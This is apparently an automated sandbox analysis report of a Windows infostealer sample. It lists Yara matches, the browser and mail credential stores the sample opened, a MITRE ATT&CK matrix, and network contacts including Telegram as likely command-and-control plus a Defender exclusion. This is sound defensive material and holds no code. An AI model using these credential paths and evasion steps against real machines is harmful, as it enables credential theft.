Source: Yara match | File source: 0.2.299371485_14108825808_1736351479899.exe.437ec40.4.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.299371485_14108825808_1736351479899.exe.433c220.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 6.2.299371485_14108825808_1736351479899.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.299371485_14108825808_1736351479899.exe.433c220.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.299371485_14108825808_1736351479899.exe.437ec40.4.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000006.00000002.4617089897.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2219355172.000000000433C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: 299371485_14108825808_1736351479899.exe PID: 4876, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: 299371485_14108825808_1736351479899.exe PID: 6240, type: MEMORYSTR
Source: Yara match | File source: 00000006.00000002.4622133854.0000000003071000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0.2.299371485_14108825808_1736351479899.exe.437ec40.4.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.299371485_14108825808_1736351479899.exe.433c220.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 6.2.299371485_14108825808_1736351479899.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.299371485_14108825808_1736351479899.exe.433c220.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.299371485_14108825808_1736351479899.exe.437ec40.4.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000006.00000002.4617089897.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2219355172.000000000433C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: 299371485_14108825808_1736351479899.exe PID: 4876, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: 299371485_14108825808_1736351479899.exe PID: 6240, type: MEMORYSTR
Source: Yara match | File source: 0.2.299371485_14108825808_1736351479899.exe.437ec40.4.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.299371485_14108825808_1736351479899.exe.433c220.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 6.2.299371485_14108825808_1736351479899.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.299371485_14108825808_1736351479899.exe.433c220.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.299371485_14108825808_1736351479899.exe.437ec40.4.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000006.00000002.4617089897.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.4622133854.0000000003127000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2219355172.000000000433C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: 299371485_14108825808_1736351479899.exe PID: 4876, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: 299371485_14108825808_1736351479899.exe PID: 6240, type: MEMORYSTR
Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites
Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe | File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\
Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: Yara match | File source: 0.2.299371485_14108825808_1736351479899.exe.437ec40.4.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.299371485_14108825808_1736351479899.exe.433c220.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 6.2.299371485_14108825808_1736351479899.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.299371485_14108825808_1736351479899.exe.433c220.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.299371485_14108825808_1736351479899.exe.437ec40.4.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000006.00000002.4617089897.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2219355172.000000000433C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: 299371485_14108825808_1736351479899.exe PID: 4876, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: 299371485_14108825808_1736351479899.exe PID: 6240, type: MEMORYSTR

Remote Access Functionality

Source: Yara match | File source: 0.2.299371485_14108825808_1736351479899.exe.437ec40.4.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.299371485_14108825808_1736351479899.exe.433c220.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 6.2.299371485_14108825808_1736351479899.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.299371485_14108825808_1736351479899.exe.433c220.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.299371485_14108825808_1736351479899.exe.437ec40.4.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000006.00000002.4617089897.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2219355172.000000000433C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: 299371485_14108825808_1736351479899.exe PID: 4876, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: 299371485_14108825808_1736351479899.exe PID: 6240, type: MEMORYSTR
Source: Yara match | File source: 00000006.00000002.4622133854.0000000003071000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0.2.299371485_14108825808_1736351479899.exe.437ec40.4.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.299371485_14108825808_1736351479899.exe.433c220.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 6.2.299371485_14108825808_1736351479899.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.299371485_14108825808_1736351479899.exe.433c220.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.299371485_14108825808_1736351479899.exe.437ec40.4.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000006.00000002.4617089897.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2219355172.000000000433C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: 299371485_14108825808_1736351479899.exe PID: 4876, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: 299371485_14108825808_1736351479899.exe PID: 6240, type: MEMORYSTR
Source: Yara match | File source: 0.2.299371485_14108825808_1736351479899.exe.437ec40.4.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.299371485_14108825808_1736351479899.exe.433c220.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 6.2.299371485_14108825808_1736351479899.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.299371485_14108825808_1736351479899.exe.433c220.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.299371485_14108825808_1736351479899.exe.437ec40.4.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000006.00000002.4617089897.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.4622133854.0000000003127000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2219355172.000000000433C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: 299371485_14108825808_1736351479899.exe PID: 4876, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: 299371485_14108825808_1736351479899.exe PID: 6240, type: MEMORYSTR
MITRE ATT&CK Matrix (a number in parentheses is the count of signatures matched to that technique; techniques without a number are unmatched matrix cells)

Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | Windows Management Instrumentation | DLL Side-Loading (1) | DLL Side-Loading (1) | Disable or Modify Tools (11) | OS Credential Dumping (1) | File and Directory Discovery (1) | Remote Services | Archive Collected Data (11) | Web Service (1) | Exfiltration Over Other Network Medium | Abuse Accessibility Features
Credentials | Domains | Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | Process Injection (12) | Deobfuscate/Decode Files or Information (1) | LSASS Memory | System Information Discovery (13) | Remote Desktop Protocol | Data from Local System (1) | Ingress Tool Transfer (3) | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | Obfuscated Files or Information (31) | Security Account Manager | Query Registry (1) | SMB/Windows Admin Shares | Email Collection (1) | Encrypted Channel (11) | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | Software Packing (12) | NTDS | Security Software Discovery (1) | Distributed Component Object Model | Clipboard Data (1) | Non-Application Layer Protocol (4) | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | Timestomp (1) | LSA Secrets | Process Discovery (2) | SSH | Keylogging | Application Layer Protocol (15) | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | DLL Side-Loading (1) | Cached Domain Credentials | Virtualization/Sandbox Evasion (31) | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | Masquerading (1) | DCSync | Application Window Discovery (1) | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | Virtualization/Sandbox Evasion (31) | Proc Filesystem | System Network Configuration Discovery (1) | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | Process Injection (12) | /etc/passwd and /etc/shadow | Network Sniffing | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
Behavior Graph ID: 1596649 | Sample: 299371485_14108825808_17363... | Startdate: 22/01/2025 | Architecture: WINDOWS | Score: 100

Process tree, network contacts and signatures recovered from the behavior graph:

Start
  Signatures: Suricata IDS alerts for network traffic; Found malware configuration; Malicious sample detected (through community Yara rule); 11 other signatures
  Domains: reallyfreegeoip.org (Tries to detect the country of the analysis system (by using the IP)); api.telegram.org (Uses the Telegram API (likely for C&C communication)); 2 other IPs or domains
  299371485_14108825808_1736351479899.exe (started)
    Dropped file: 299371485_14108825...36351479899.exe.log, ASCII
    Signature: Adds a directory exclusion to Windows Defender
    299371485_14108825808_1736351479899.exe (started)
      api.telegram.org 149.154.167.220, 443, 49789, 49844 TELEGRAMRU United Kingdom
      checkip.dyndns.com 158.101.44.242, 49712, 49722, 49733 ORACLE-BMC-31898US United States
      reallyfreegeoip.org 104.21.16.1, 443, 49713, 49716 CLOUDFLARENETUS United States
      Signatures: Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal browser information (history, passwords, etc)
    powershell.exe (started)
      Signature: Loading BitLocker PowerShell Module
      WmiPrvSE.exe (started)
      conhost.exe (started)
